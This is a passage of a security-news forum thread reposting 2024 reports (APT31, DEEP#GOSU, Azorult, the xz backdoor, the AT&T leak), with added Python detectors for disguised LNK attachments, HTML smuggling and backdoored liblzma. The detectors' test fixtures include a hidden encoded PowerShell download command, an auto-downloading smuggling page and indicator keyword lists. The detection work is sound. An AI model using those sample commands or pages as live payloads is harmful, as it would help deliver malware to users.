Notably, several vulnerabilities that Microsoft assesses as being only of "important" severity and less likely to be exploited still have severity scores of more than 9.0 out of 10 on the CVSS vulnerability-severity scale because of their potential impact, if abused.

"This month's Patch Tuesday presents a reduction in fixed vulnerabilities from Microsoft, totaling 60, a decrease from last month's 74 updates," Mike Walters, president and co-founder of Action1, wrote in emailed comments. "Notably absent this month are any zero-day vulnerabilities or proofs of concept (PoCs), underscoring a moment of relative calm."

Critical RCE, DoS Hyper-V Vulnerabilities

The RCE bug in Hyper-V gives attackers a way to take complete control of affected systems and potentially compromise virtual machines housed on the Hyper-V server, says Sarah Jones, cyber threat intelligence research analyst at Critical Start.

The DoS vulnerability, meanwhile, allows an adversary to crash the Hyper-V service, rendering it unusable.

"This could prevent users from accessing virtual machines (VMs) hosted on the Hyper-V server, potentially causing significant disruption to critical business operations," Jones notes. "If you use Hyper-V, it is crucial to install the security updates immediately to address these critical vulnerabilities and protect your systems."



https://www.darkreading.com/vulnerabili ... tch-update
RTH10260
Posts: 14805
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot

Cyber Attacks and Hacking

#168

Post by RTH10260 »

US and UK unveil sanctions against Chinese state-backed hackers over alleged ‘malicious’ attacks
The US alleges the individuals were working as a front for Beijing in an indictment and sanctions announcement

Nick Robins-Early and agencies
Tue 26 Mar 2024 05.20 CET

Hackers backed by China’s government spy agency have been accused by the US and UK of conducting a years-long cyber-attack campaign, targeting politicians, journalists and businesses.

The operation saw political dissidents and critics of China targeted by sophisticated phishing campaigns, according to the US, which resulted in some email systems and networks being compromised.

The US government announced sanctions on Monday against hackers that it alleges were responsible for operating the scheme. Two individuals and a front company linked to the cyber-espionage group APT31, which is associated with the Chinese ministry of state security, have been hit with sanctions by the UK.

On Tuesday, the New Zealand government said it had also raised concerns with the Chinese government about its involvement in an attack which targeted the country’s parliamentary entities in 2021.

The US treasury’s office of foreign assets control stated that it sanctioned Wuhan Xiaoruizhi Science and Technology Company Ltd, which it calls a front for the Chinese ministry of state security that has “served as cover for multiple malicious cyberoperations”.

In press releases and unsealed indictment, the US government accused China of perpetrating an elaborate and invasive state-backed hacking program that goes back over a decade. Merrick Garland, the US Attorney General, called the hacking operation proof of “the ends to which the Chinese government is willing to go to target and intimidate its critics”.

The treasury office named two Chinese nationals, Zhao Guangzong and Ni Gaobin, affiliated with the Wuhan company, for cyberoperations that targeted US critical infrastructure sectors including defense, aerospace and energy. It also listed these threats as part of the cyber hacking group APT 31, which stands for “advanced persistent threat” and includes state-sponsored contract hackers and intelligence officers.

“APT 31 has targeted a wide range of high-ranking US government officials and their advisors integral to US national security,” the department said in a press release.

The US Department of Justice charged Zhao, Ni, and five other hackers with conspiracy to commit computer intrusions and wire fraud. The agency said they were part of a 14-year-long cyber operation “targeting US and foreign critics, businesses and political officials”.

“Today’s announcements underscore the need to remain vigilant to cybersecurity threats and the potential for cyber-enabled foreign malign influence efforts, especially as we approach the 2024 election cycle,” Matthew G Olsen, the assistant attorney general, said.



https://www.theguardian.com/technology/ ... se-hackers
RTH10260
Posts: 14805
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot

Cyber Attacks and Hacking

#169

Post by RTH10260 »

New DEEP#GOSU Malware Campaign Targets Windows Users with Advanced Tactics

Mar 18, 2024
Newsroom | Cybercrime / Cryptocurrency

A new elaborate attack campaign has been observed employing PowerShell and VBScript malware to infect Windows systems and harvest sensitive information.

Cybersecurity company Securonix, which dubbed the campaign DEEP#GOSU, said it's likely associated with the North Korean state-sponsored group tracked as Kimsuky (aka Emerald Sleet, Springtail, or Velvet Chollima).

"The malware payloads used in the DEEP#GOSU represent a sophisticated, multi-stage threat designed to operate stealthily on Windows systems especially from a network-monitoring standpoint," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a technical analysis shared with The Hacker News.

"Its capabilities included keylogging, clipboard monitoring, dynamic payload execution, and data exfiltration, and persistence using both RAT software for full remote access, scheduled tasks as well as self-executing PowerShell scripts using jobs."

A notable aspect of the infection procedure is that it leverages legitimate services such as Dropbox or Google Docs for command-and-control (C2), thus allowing the threat actor to blend undetected into regular network traffic.

On top of that, the use of such cloud services to stage the payloads allows for updating the functionality of the malware or delivering additional modules.

The starting point is said to be a malicious email attachment containing a ZIP archive with a rogue shortcut file (.LNK) that masquerades as a PDF file ("IMG_20240214_0001.pdf.lnk").

The .LNK file comes embedded with a PowerShell script as well as a decoy PDF document, with the former also reaching out to an actor-controlled Dropbox infrastructure to retrieve and execute another PowerShell script ("ps.bin").




https://thehackernews.com/2024/03/new-d ... rgets.html
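Taking the delivery chain described in the write-up above (a ZIP attachment carrying a shortcut named like a PDF, which launches PowerShell and fetches a second stage from Dropbox), here is an added example of the kind of attachment check a mail gateway or triage script would run for that pattern. It is example code written for this thread, not Securonix's tooling and not anything from the campaign: the sample archive, the synthetic shortcut body and the indicator strings are constructed for the demonstration, and only the decoy filename is taken from the article.

```python
from __future__ import annotations

import io
import re
import zipfile

# A Windows shell link (.lnk) begins with HeaderSize 0x0000004C followed by the
# LinkCLSID 00021401-0000-0000-C000-000000000046, both little-endian (MS-SHLLINK).
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

# Document/image extensions an attacker hides a shortcut behind ("invoice.pdf.lnk").
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "jpg", "png"}
DOUBLE_EXT = re.compile(r"\.([a-z0-9]{2,5})\.lnk$", re.IGNORECASE)

# Strings worth flagging inside a shortcut body (constructed list). LNK stores its
# argument strings as UTF-16LE when the IsUnicode flag is set, so both encodings are checked.
IOC_STRINGS = ("powershell", "-w hidden", "-enc", "dropbox.com", "docs.google.com")
MAX_MEMBER = 1_000_000  # shortcuts are tiny; cap reads so a zip bomb cannot exhaust memory


def _has_string(body: bytes, needle: str) -> bool:
    low = body.lower()  # bytes.lower() folds ASCII only, which is all we need here
    return needle.encode() in low or needle.encode("utf-16-le") in low


def scan_zip(data: bytes) -> list[dict]:
    """Return one finding per archive member that looks like a disguised shortcut."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            with zf.open(info) as fh:
                body = fh.read(MAX_MEMBER)
            reasons = []
            m = DOUBLE_EXT.search(name)
            if m and m.group(1).lower() in DECOY_EXTS:
                reasons.append(f"decoy double extension .{m.group(1).lower()}.lnk")
            is_lnk = body.startswith(LNK_MAGIC)
            if is_lnk and not name.lower().endswith(".lnk"):
                reasons.append("LNK header but non-.lnk name")
            if is_lnk:
                hits = [s for s in IOC_STRINGS if _has_string(body, s)]
                if hits:
                    reasons.append("shortcut body references " + ", ".join(hits))
            if reasons:
                findings.append({"name": name, "reasons": reasons})
    return findings


def build_sample_zip() -> bytes:
    """Constructed test archive: a benign text file plus a fake shortcut using the decoy
    name from the write-up. The shortcut body is synthetic (valid header, made-up
    arguments), not the real payload."""
    args = "powershell.exe -w hidden -enc QQBCAEMA https://www.dropbox.com/s/example/ps.bin"
    fake_lnk = LNK_MAGIC + b"\x00" * 60 + args.encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.txt", "nothing to see here\n")
        zf.writestr("IMG_20240214_0001.pdf.lnk", fake_lnk)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(build_sample_zip()):
        print(f["name"], "->", "; ".join(f["reasons"]))
```

The header check is the one that matters: renaming the shortcut defeats the filename test, but a file that starts with the shell-link header is a shortcut whatever it is called, and mail clients still hand it to Explorer as one. Checking the UTF-16LE form of the indicator strings is what catches the arguments in a real shortcut; a plain ASCII grep over the file would miss them.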
RTH10260
Posts: 14805
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot

Cyber Attacks and Hacking

#170

Post by RTH10260 »

From Delivery To Execution: An Evasive Azorult Campaign Smuggled Through Google Sites

Mar 15 2024
By Jan Michael Alcantara

Summary

Netskope Threat Labs has observed an evasive Azorult campaign in the wild that employs multiple defense evasion techniques from delivery through execution to fly under the defender’s radar as it steals sensitive data.

Azorult is an information stealer first discovered in 2016 that steals sensitive information including user credentials, browser information, and crypto wallet data. Azorult is on the rise and is currently one of the top malware families that Netskope Threat Labs has observed targeting the healthcare industry over the last year.

In this blog post, Netskope Threat Labs performs a detailed teardown of an evasive Azorult malware campaign we observed in the wild. This campaign is noteworthy for the following reasons:
  • It delivers its initial payload through HTML smuggling, a detection evasion technique that is gaining popularity among adversaries. This defense evasion technique was also used by a nation-state group to smuggle a remote access trojan, and by Nokoyawa ransomware, where they started the infection process through HTML smuggling.
  • It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website.
  • It executes the fileless Azorult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts.
  • It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender.
  • It steals sensitive data, including information for 137 distinct crypto wallets, login credentials, browser files, and important documents.

Google Sites serves as a decoy for HTML smuggling

HTML smuggling is a defense evasion technique that aims to bypass web controls that block risky file types. It abuses legitimate HTML5 download attributes and JavaScript blobs to construct malicious payloads on the client side, bypassing network security filters.



https://www.netskope.com/blog/from-deli ... ogle-sites
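As an added illustration of the mechanism the post explains (a Blob assembled in the browser plus a forced download, with the payload either inline as base64 or, in the variant Netskope describes, pulled from a remote JSON file), the following scanner flags pages that carry that pattern and decodes whatever base64 payload is embedded. It is example code written for this thread, not Netskope's tooling. The three sample pages are constructed, including the example.invalid host and the fake MZ-prefixed payload; nothing in them comes from the real campaign.

```python
import base64
import re

# Browser-side primitives an HTML-smuggling page needs in order to assemble a file
# from data that never crossed the network as a downloadable file.
INDICATORS = {
    "blob_ctor": re.compile(r"new\s+Blob\s*\(", re.I),
    "object_url": re.compile(r"URL\.createObjectURL\s*\(", re.I),
    "download_attr": re.compile(r"\.download\s*=|\bdownload\s*=\s*[\"']", re.I),
    "ms_save_blob": re.compile(r"msSaveOrOpenBlob|msSaveBlob", re.I),
    "base64_decode": re.compile(r"\batob\s*\(", re.I),
    "auto_click": re.compile(r"\.click\s*\(\s*\)", re.I),
    "external_json": re.compile(r"fetch\s*\(\s*[\"']https?://[^\"']+\.json[\"']", re.I),
}
# A quoted base64 run this long is a payload, not an inline icon.
B64_RUN = re.compile(r"[\"']([A-Za-z0-9+/]{200,}={0,2})[\"']")
MAGIC = {b"MZ": "PE executable", b"PK\x03\x04": "ZIP/Office archive",
         b"%PDF": "PDF", b"\x7fELF": "ELF"}


def scan_html(html: str) -> dict:
    """Score one HTML document for the smuggling pattern and decode any embedded payload."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    embedded = []
    for m in B64_RUN.finditer(html):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        kind = next((k for magic, k in MAGIC.items() if raw.startswith(magic)), "unknown")
        embedded.append({"bytes": len(raw), "type": kind})
    assembles_file = "blob_ctor" in hits or "ms_save_blob" in hits
    forces_save = "download_attr" in hits or "ms_save_blob" in hits
    # Payload data either sits in the page as base64 or is fetched from a remote JSON file.
    has_payload_source = bool(embedded) or "base64_decode" in hits or "external_json" in hits
    return {
        "indicators": hits,
        "embedded": embedded,
        "smuggling": assembles_file and forces_save and has_payload_source,
    }


# Constructed samples (not pages from the campaign): the classic inline-base64 form,
# the remote-JSON variant, and a benign page that merely uses the download attribute.
_FAKE_PAYLOAD = base64.b64encode(b"MZ" + b"\x90" * 200).decode()

_INLINE_PAGE = """<html><body><script>
var b64 = "__PAYLOAD__";
var bin = atob(b64);
var bytes = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
var blob = new Blob([bytes], {type: "application/octet-stream"});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "invoice.pdf";
a.click();
</script></body></html>""".replace("__PAYLOAD__", _FAKE_PAYLOAD)

_REMOTE_JSON_PAGE = """<html><body><script>
fetch("https://example.invalid/data.json")
  .then(function (r) { return r.json(); })
  .then(function (j) {
    var bytes = Uint8Array.from(atob(j.data), function (c) { return c.charCodeAt(0); });
    var blob = new Blob([bytes], {type: "application/octet-stream"});
    var a = document.createElement("a");
    a.href = URL.createObjectURL(blob);
    a.download = "statement.pdf";
    a.click();
  });
</script></body></html>"""

_BENIGN_PAGE = """<html><body>
<a href="/files/report.pdf" download="report.pdf">Download the report</a>
</body></html>"""


def sample_pages() -> dict:
    return {"inline": _INLINE_PAGE, "remote_json": _REMOTE_JSON_PAGE, "benign": _BENIGN_PAGE}


if __name__ == "__main__":
    for label, page in sample_pages().items():
        print(label, scan_html(page))
```

The remote-JSON variant is why a proxy that only inspects the HTML response misses it: the page itself contains no payload bytes, so the file-type filter sees a small script and a harmless-looking JSON fetch. Matching on the combination (Blob construction, a forced download, and some payload source) rather than any single indicator is what keeps an ordinary `download="report.pdf"` link from being flagged.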
RTH10260
Posts: 14805
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot

Cyber Attacks and Hacking

#171

Post by RTH10260 »

Fujitsu: Malware on Company Computers Exposed Customer Data
It remains unclear how long the IT services giant's systems were infiltrated and just how the cyberattack unfolded.

Becky Bracken, Senior Editor, Dark Reading
March 18, 2024

Global business technology colossus Fujitsu issued an apology for exposing customer data, following an investigation precipitated by the discovery of malware on the company's computers.

The Japanese corporation confirmed the cyber incident in a statement issued on March 15.

"After confirming the presence of malware, we immediately disconnected the affected business computers and took measures such as strengthening monitoring of other business computers," Fujitsu said in a statement translated by Google into English. "Additionally, we are currently continuing to investigate the circumstances surrounding the malware's intrusion and whether information has been leaked."

The multinational corporation said it reported the incident to Japanese regulators at the Personal Information Protection Commission.

What remains unclear is exactly how long the data was exposed, which is something Fujitsu customers should want to know, Roger Grimes, data-driven defense evangelist at KnowBe4, explained in a statement. Fujitsu also needs to provide additional details about the breach itself, he said.

"It's especially important to understand how the breach happened," Grimes said. "In order for an impacted customer to regain trust, they need to learn how the attack happened and what steps Fujitsu were taking to make sure it did not happen again (at least using the same attacker methods)."

Fujitsu's Cyber Posture Typical Among Enterprises

This incident highlights the need for enterprises to engage in more proactive cybersecurity strategies, Darren Williams, CEO and founder of BlackFog, said in response to the Fujitsu data leak.

"The reliance on defensive strategies is no longer sufficient and all organizations must refocus on data security," Williams explained in a statement. "As we have seen countless times, cybercriminals will always find a way in, and once they have your data, there is no limit to what they can do to leverage it."

Colin Little, security engineer at Centripetal, sees organizations like Fujitsu far too often learning after the fact that their data has been exposed. He added it can be a very emotional experience for enterprise cybersecurity teams.

"I reassure them, saying that this is an all-too-common finding in the world we live in today; that they are, by and large, not alone," Little said. "This current event is case-in-point: If a global company with as much money and human resources is having the same struggle as the rest of us to limit the depth and damage of intrusions, a different approach is required to be proactive against today's cyber threat."



https://www.darkreading.com/cyberattack ... tomer-data
RTH10260
Posts: 14805
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot

Cyber Attacks and Hacking

#172

Post by RTH10260 »

How one volunteer stopped a backdoor from exposing Linux systems worldwide
An off-the-clock Microsoft worker prevented malicious code from spreading into widely-used versions of Linux via a compression format called XZ Utils.

By Amrita Khalid
Apr 3, 2024, 1:38 AM GMT+2

Linux, the most widely used open source operating system in the world, narrowly escaped a massive cyber attack over Easter weekend, all thanks to one volunteer.

The backdoor had been inserted into a recent release of a Linux compression format called XZ Utils, a tool that is little-known outside the Linux world but is used in nearly every Linux distribution to compress large files, making them easier to transfer. If it had spread more widely, an untold number of systems could have been left compromised for years.

And as Ars Technica noted in its exhaustive recap, the culprit had been working on the project out in the open.

The vulnerability, inserted into Linux’s remote log-in, only exposed itself to a single key, so that it could hide from scans of public computers. As Ben Thompson writes in Stratechery, “the majority of the world’s computers would be vulnerable and no one would know.”

The story of the XZ backdoor’s discovery starts in the early morning of March 29th, as San Francisco-based Microsoft developer Andres Freund posted on Mastodon and sent an email to OpenWall’s security mailing list with the heading: “backdoor in upstream xz/liblzma leading to ssh server compromise.”

Freund, who volunteers as a “maintainer” for PostgreSQL, a Linux-based database, noticed a few strange things over the past few weeks while running tests. Encrypted log-ins to liblzma, part of the XZ compression library, were using up a ton of CPU. None of the performance tools he used revealed anything, Freund wrote on Mastodon. This immediately made him suspicious, and he remembered an “odd complaint” from a Postgres user a couple of weeks earlier about Valgrind, Linux’s program that checks for memory errors.

After some sleuthing, Freund eventually discovered what was wrong. “The upstream xz repository and the xz tarballs have been backdoored,” noted Freund in his email. The malicious code was in versions 5.6.0 and 5.6.1 of the xz tools and libraries.

Shortly after, enterprise opensource software company Red Hat sent out an emergency security alert for users of Fedora Rawhide and Fedora Linux 40. Ultimately, the company concluded that the beta version of Fedora Linux 40 contained two affected versions of the xz libraries. Fedora Rawhide versions likely received versions 5.6.0 or 5.6.1 as well.



https://www.theverge.com/2024/4/2/24119 ... or-attempt
RTH10260
Posts: 14805
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot

Cyber Attacks and Hacking

#173

Post by RTH10260 »

Note: the original news item in the following post!
Backdoor found in widely used Linux utility targets encrypted SSH connections
Malicious code planted in xz Utils has been circulating for more than a month.

Dan Goodin
3/29/2024, 7:50 PM

Researchers have found a malicious backdoor in a compression tool that made its way into widely used Linux distributions, including those from Red Hat and Debian.

The compression utility, known as xz Utils, introduced the malicious code in versions 5.6.0 and 5.6.1, according to Andres Freund, the developer who discovered it. There are no known reports of those versions being incorporated into any production releases for major Linux distributions, but both Red Hat and Debian reported that recently published beta releases used at least one of the backdoored versions—specifically, in Fedora Rawhide and Debian testing, unstable and experimental distributions. A stable release of Arch Linux is also affected. That distribution, however, isn't used in production systems.

Because the backdoor was discovered before the malicious versions of xz Utils were added to production versions of Linux, “it's not really affecting anyone in the real world,” Will Dormann, a senior vulnerability analyst at security firm Analygence, said in an online interview. “BUT that's only because it was discovered early due to bad actor sloppiness. Had it not been discovered, it would have been catastrophic to the world.”

Several people, including two Ars readers, reported that the multiple apps included in the Homebrew package manager for macOS rely on the backdoored 5.6.1 version of xz Utils. Homebrew has now rolled back the utility to version 5.4.6. Maintainers have more details available here.

Targeting sshd

The first signs of the backdoor were introduced in a February 23 update that added obfuscated code, officials from Red Hat said in an email. An update the following day included a malicious install script that injected itself into functions used by sshd, the binary file that makes SSH work. The malicious code has resided only in the archived releases—known as tarballs—which are released upstream. So-called GIT code available in repositories isn’t affected, although it does contain second-stage artifacts allowing the injection during the build time. In the event the obfuscated code introduced on February 23 is present, the artifacts in the GIT version allow the backdoor to operate.

The malicious changes were submitted by JiaT75, one of the two main xz Utils developers with years of contributions to the project.



https://arstechnica.com/security/2024/0 ... nnections/
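For the xz backdoor covered in the two posts above (#172 and #173), a first-pass triage check for a host: is the installed liblzma one of the 5.6.0/5.6.1 releases the reports name, and does the local sshd actually map that library? This is added example code for this thread, not from The Verge, Ars Technica, Red Hat or the xz project. The sample `xz --version` and `ldd` outputs are constructed, the `/usr/sbin/sshd` path is an assumption, and the live-host function simply runs those two commands and feeds their output to the same parser.

```python
from __future__ import annotations

import re
import shutil
import subprocess
from typing import Optional

# Upstream xz Utils releases that shipped the trojaned liblzma, per the reports above.
BACKDOORED = {(5, 6, 0), (5, 6, 1)}

# `xz --version` prints two lines, e.g. "xz (XZ Utils) 5.6.1" then "liblzma 5.6.1";
# the library line is the one that matters because sshd loads liblzma, not the xz binary.
LIBLZMA_RX = re.compile(r"^liblzma\s+(\d+)\.(\d+)\.(\d+)", re.M)
# One `ldd` line: "\tliblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x...)"
LDD_RX = re.compile(r"^\s*liblzma\.so\S*\s*=>\s*(\S+)", re.M)


def parse_liblzma_version(xz_version_output: str) -> Optional[tuple[int, int, int]]:
    """Pull the (major, minor, patch) tuple from the liblzma line, or None if absent."""
    m = LIBLZMA_RX.search(xz_version_output)
    return tuple(int(x) for x in m.groups()) if m else None


def sshd_liblzma_path(ldd_output: str) -> Optional[str]:
    """Path of the liblzma that sshd would map, or None if sshd does not load it."""
    m = LDD_RX.search(ldd_output)
    return m.group(1) if m else None


def assess(xz_version_output: str, ldd_output: str) -> dict:
    ver = parse_liblzma_version(xz_version_output)
    lib = sshd_liblzma_path(ldd_output)
    bad = ver in BACKDOORED
    return {
        "liblzma_version": ver,
        "backdoored_version": bad,
        "sshd_liblzma": lib,
        # The sshd hook only fires when sshd actually maps liblzma; on the affected
        # distributions that happens indirectly through libsystemd, which links against it.
        "sshd_exposed": bad and lib is not None,
    }


def assess_live_host(sshd_path: str = "/usr/sbin/sshd") -> dict:
    """Run the real commands; only meaningful on a Linux host with xz and ldd installed."""
    xz = shutil.which("xz")
    xz_out = subprocess.run([xz, "--version"], capture_output=True, text=True).stdout if xz else ""
    ldd = shutil.which("ldd")
    ldd_out = subprocess.run([ldd, sshd_path], capture_output=True, text=True).stdout if ldd else ""
    return assess(xz_out, ldd_out)


# Constructed sample outputs (not captured from a real compromised host).
SAMPLE_XZ_VERSION = "xz (XZ Utils) 5.6.1\nliblzma 5.6.1\n"
SAMPLE_LDD = (
    "\tlinux-vdso.so.1 (0x00007ffc12345000)\n"
    "\tlibsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 (0x00007f1a00000000)\n"
    "\tliblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f19ff000000)\n"
    "\tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f19fe000000)\n"
)

if __name__ == "__main__":
    print(assess(SAMPLE_XZ_VERSION, SAMPLE_LDD))
```

The version string is only what the library reports about itself; a distribution that rebuilt 5.6.x from clean sources or rolled back to 5.4.x will show different numbers, so treat the package manager's advisory and package signatures as authoritative and this as a quick first pass. The `ldd` half is there because the hook lives in liblzma but targets sshd: a host carrying the bad library whose sshd never loads it is not exposed through this path, and a host whose sshd does load it is the one to take off the network first.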
RTH10260
Posts: 14805
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot

Cyber Attacks and Hacking

#174

Post by RTH10260 »

AT&T says personal information, data from 73 million accounts leaked onto dark web

Mike Snider, USA Today
2024-03-30

AT&T is investigating how tens of millions of former and current customers had their personal information leaked on the dark web earlier this month.

In addition to the 7.6 million current AT&T customers affected, the telecom giant said in an announcement Saturday about 65.4 million former customers "had some data released" within the data set, which "appears to be from 2019 or earlier."

Leaked onto the dark web two weeks ago, the data set had personal information including Social Security numbers and data from "AT&T data-specific fields." The "compromised data" does not contain personal financial information or call history, AT&T said.

The company is investigating the incident, but said "it is not yet known whether the data in those fields originated from AT&T or one of its vendors."

AT&T said it has contacted all 7.6 million current customers who were impacted and reset their passcodes after it learned "that a number of AT&T passcodes have been compromised," according to its note to customers.

The company will contact all current and past customers whose "sensitive personal information" was compromised and has launched "a robust investigation supported by internal and external cybersecurity experts."

AT&T asks customers to 'remain vigilant' about their data following leak

Additionally, AT&T encouraged "customers to remain vigilant by monitoring account activity and credit reports" and included links to credit bureaus in its note to customers.

Tech news sites CNET and TechCrunch report the data stems from a 2021 breach that AT&T denied then. A portion of that data set appeared online at the time. Then earlier this week, the data set from that breach resurfaced and included sensitive information such as Social Security numbers, home addresses and names, the sites reported.




https://eu.usatoday.com/story/tech/2024 ... 156048007/
RTH10260
Posts: 14805
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot

Cyber Attacks and Hacking

#175

Post by RTH10260 »

Fake Facebook MidJourney AI page promoted malware to 1.2 million people

By Bill Toulas
April 5, 2024 12:47 PM

Hackers are using Facebook advertisements and hijacked pages to promote fake Artificial Intelligence services, such as MidJourney, OpenAI's SORA and ChatGPT-5, and DALL-E, to infect unsuspecting users with password-stealing malware.

The malvertising campaigns are created by hijacked Facebook profiles that impersonate popular AI services, pretending to offer a sneak preview of new features.

Users tricked by the ads become members of fraudulent Facebook communities, where the threat actors post news, AI-generated images, and other related info to make the pages look legitimate.

However, the community posts often promote limited-time access to upcoming and eagerly anticipated AI services, tricking the users into downloading malicious executables that infect Windows computers with information-stealing malware, like Rilide, Vidar, IceRAT, and Nova.

Information-stealing malware focuses on stealing data from a victim's browser, including stored credentials, cookies, cryptocurrency wallet information, autocomplete data, and credit card information.

This data is then sold on dark web markets or used by the attackers to breach the target's online accounts to promote further scams or conduct fraud.

Midjourney campaign

The reach of those campaigns is staggering in some cases, as people's interest in AI is currently very high. The developments in the field are so rapid that it's not easy for people to keep up and discern legitimate announcements from obvious fakes.

In one of the cases seen by researchers at Bitdefender, a malicious Facebook page impersonating Midjourney amassed 1.2 million followers and remained active for nearly a year before it was eventually taken down.

The page wasn't created from scratch; instead, the attackers hijacked an existing profile in June 2023 and converted it to a fake Midjourney page. Facebook shut down the page on March 8, 2024.




https://www.bleepingcomputer.com/news/s ... on-people/